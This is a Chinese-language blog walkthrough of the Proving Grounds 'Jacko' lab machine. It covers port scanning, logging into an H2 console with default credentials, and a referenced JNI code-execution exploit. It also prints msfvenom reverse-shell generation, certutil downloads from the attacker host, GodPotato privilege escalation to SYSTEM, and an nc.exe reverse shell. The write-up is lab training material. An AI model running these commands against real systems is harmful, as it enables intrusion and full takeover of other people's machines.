Proving Grounds Practice-Jacko

她 奔离了海滩 留下些遗憾 孤单也没那么心酸

我 模仿着不平凡 却又一边 渴望着陪伴

靶机ip:192.168.55.66

难度:困难

涉及内容:sql语句提权,数据库代码执行,godpotato提权

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
???(root?kali)-[/home/kali/Desktop]
??# nmap -p- 192.168.55.66                 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-20 06:36 +0000
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.90% done; ETC: 06:47 (0:09:31 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.43% done; ETC: 06:47 (0:08:39 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.43% done; ETC: 06:47 (0:08:39 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.44% done; ETC: 06:47 (0:08:38 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.44% done; ETC: 06:47 (0:08:38 remaining)
Stats: 0:03:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.54% done; ETC: 06:47 (0:07:24 remaining)
Stats: 0:05:34 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.27% done; ETC: 06:46 (0:05:17 remaining)
Stats: 0:07:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.67% done; ETC: 06:46 (0:03:19 remaining)
Stats: 0:09:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 82.20% done; ETC: 06:46 (0:01:57 remaining)
Stats: 0:10:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.16% done; ETC: 06:47 (0:00:19 remaining)
Nmap scan report for 192.168.55.66
Host is up (0.00073s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
8082/tcp  open  blackice-alerts
9092/tcp  open  XmlIpcRegSvc
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 663.33 seconds
                                                               
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
??(root?kali)-[/home/kali/Desktop]
??# nmap -p80,135,139,445,5040,8082,9092,49664,49665,49666,49667,49668,49669 192.168.55.66 -sC -sV -T4 -A
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-20 06:48 +0000
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 06:50 (0:00:08 remaining)
Nmap scan report for 192.168.55.66
Host is up (0.00074s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
8082/tcp  open  http          H2 database http console
|_http-title: H2 Console
9092/tcp  open  XmlIpcRegSvc?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :



curl一下80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
???(root?kali)-[/home/kali/Desktop]
??# curl 192.168.55.66  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
Copyright 2004-2019 H2 Group. Multiple-Licensed under the MPL 2.0,
and the EPL 1.0 (http://h2database.com/html/license.html).
Initial Developer: H2 Group
-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="description" content="H2 is free SQL database written in Java"/>
<title>
H2 Database Engine (redirect)
</title><link rel="stylesheet" type="text/css" href="html/stylesheet.css" />
<script type="text/javascript">
location.href = 'html/main.html';
</script>
</head>
<body style="margin: 20px;">

<h1>H2 Database Engine</h1>
<p>
Welcome to H2, the free SQL database. The main feature of H2 are:
</p>
<ul>
<li>It is free to use for everybody, source code is included
</li><li>Written in Java, but also available as native executable
</li><li>JDBC and (partial) ODBC API
</li><li>Embedded and client/server modes
</li><li>Clustering is supported
</li><li>A web client is included
</li></ul>

<h2>No Javascript</h2>
<p>
If you are not automatically redirected to the main page, then
Javascript is currently disabled or your browser does not support Javascript.
Some features (for example the integrated search) require Javascript.
Please enable Javascript, or go ahead without it:
</p><p>
<a href="html/main.html" style="font-size: 16px; font-weight: bold">H2 Database Engine</a>
</p>

</body></html>

另外8082端口是数据库的管理界面,默认账户sa加上空密码可以直接登进去

H2 Database 1.4.199 - JNI Code Execution - Java local Exploit

照着执行即可

msf生成马子

1
2
3
4
5
6
7
8
9
???(root?kali)-[/home/kali/Desktop]
??# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.55 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: reverse.exe

1
certutil -split -urlcache -f http://192.168.49.55/reverse.exe C:\\Users\\tony\\rev.exe

1
2
3
4
5
6
7
8
9
10
11
???(root?kali)-[/home/kali/Desktop]
??# wget -q https://raw.githubusercontent.com/brightio/penelope/refs/heads/main/penelope.py && python3 penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 ? 192.168.49.55
?  ? Main Menu (m) ? Payloads (p) ? Clear (Ctrl-L) ? Quit (q/Ctrl-C)
[+] [New Reverse Shell] =>  192.168.55.66 WINDOWS ? operable program or batch file. ?? Session ID <1>
[+] Added readline support...
[+] Interacting with session [1] ? Readline ? Menu key Ctrl-D ?
[+] Session log: /home/kali/.penelope/sessions/192.168.55.66-WINDOWS/2026_04_20-07_21_11-108.log
??????????????????????????????????????????????????????????????????????????????????????????????????????????
C:\Program Files (x86)\H2\service>

1
2
3
4
5
C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

但是很奇怪的是执行不了whoami

也许和当前的环境变量有关

1
2
3
4
5
6
7
8
9
10
C:\Program Files (x86)\H2\service>cd c:\windows\system32
cd c:\windows\system32

c:\Windows\System32>

c:\Windows\System32>whoami
whoami
jacko\tony


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
c:\Windows\System32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name  SID                                           
========== ==============================================
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled



模拟权限开了?那直接godpatato提权得了

1
2
3
4
5
6
7
8
9
10
c:\Windows\System32>certutil -split -urlcache -f http://192.168.49.55/GodPotato-NET4.exe C:\\Users\\tony\\GodPotato-NET4.exe
certutil -split -urlcache -f http://192.168.49.55/GodPotato-NET4.exe C:\\Users\\tony\\GodPotato-NET\GodPotato-NET4.exe
****  Online  ****
  0000  ...
  e000


CertUtil: -URLCache command completed successfully.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\tony>GodPotato-NET4.exe -cmd "cmd /c whoami"
GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140735462309888
[*] DispatchTable: 0x140735464652384
[*] UseProtseqFunction: 0x140735464019984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\dfb4968b-871e-4770-a8d0-a2e05574f334\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000cc02-0d6c-ffff-45de-e5ac31e70806
[*] DCOM obj OXID: 0x322b4bc94cefbad3
[*] DCOM obj OID: 0x3da460c334b8ad1c
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1460

1
2
3
4
5
6
7
c:\Windows\System32>certutil -split -urlcache -f http://192.168.49.55/nc.exe C:\\Users\\tony\\nc.exe
certutil -split -urlcache -f http://192.168.49.55/nc.exe C:\\Users\\tony\\nc.exe
****  Online  ****
  0000  ...
  e800
CertUtil: -URLCache command completed successfully.

1
2
3
4
5
6
7
8
9
10
11
12
13
???(root?kali)-[/usr/share/windows-resources/binaries]
??# ls
enumplus     fgdump  klogger.exe  nbtenum  plink.exe   vncviewer.exe  whoami.exe
exe2bat.exe  fport   mbenum       nc.exe   radmin.exe  wget.exe
                                                                                                          
???(root?kali)-[/usr/share/windows-resources/binaries]
??# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.55.66 - - [20/Apr/2026 07:48:49] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:48:49] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:49:15] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:49:15] "GET /nc.exe HTTP/1.1" 200 -

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\tony>GodPotato-NET4.exe -cmd "cmd /c C:\Users\tony\nc.exe 192.168.49.55 5555 -e cmd.exe"
GodPotato-NET4.exe -cmd "cmd /c C:\Users\tony\nc.exe 192.168.49.55 5555 -e cmd.exe"
[*] CombaseModule: 0x140735462309888
[*] DispatchTable: 0x140735464652384
[*] UseProtseqFunction: 0x140735464019984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\5080d89a-5c40-4db8-beff-473c23064c80\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005402-0fd4-ffff-cca4-053d263dd56d
[*] DCOM obj OXID: 0x1298a5c42aef4993
[*] DCOM obj OID: 0x8c5bfaa20f7f4d13
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3536

1
2
3
4
5
6
7
8
C:\Windows\system32>whoami
whoami

C:\Windows\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
d8ddf60b6ae45ed458bb87e6fcf37ba3


#PG
Proving Grounds Practice-Jacko
http://example.com/2026/04/20/Proving-Grounds-Practice-Jacko/
Author
Skyarrow
Posted on
April 20, 2026
Licensed under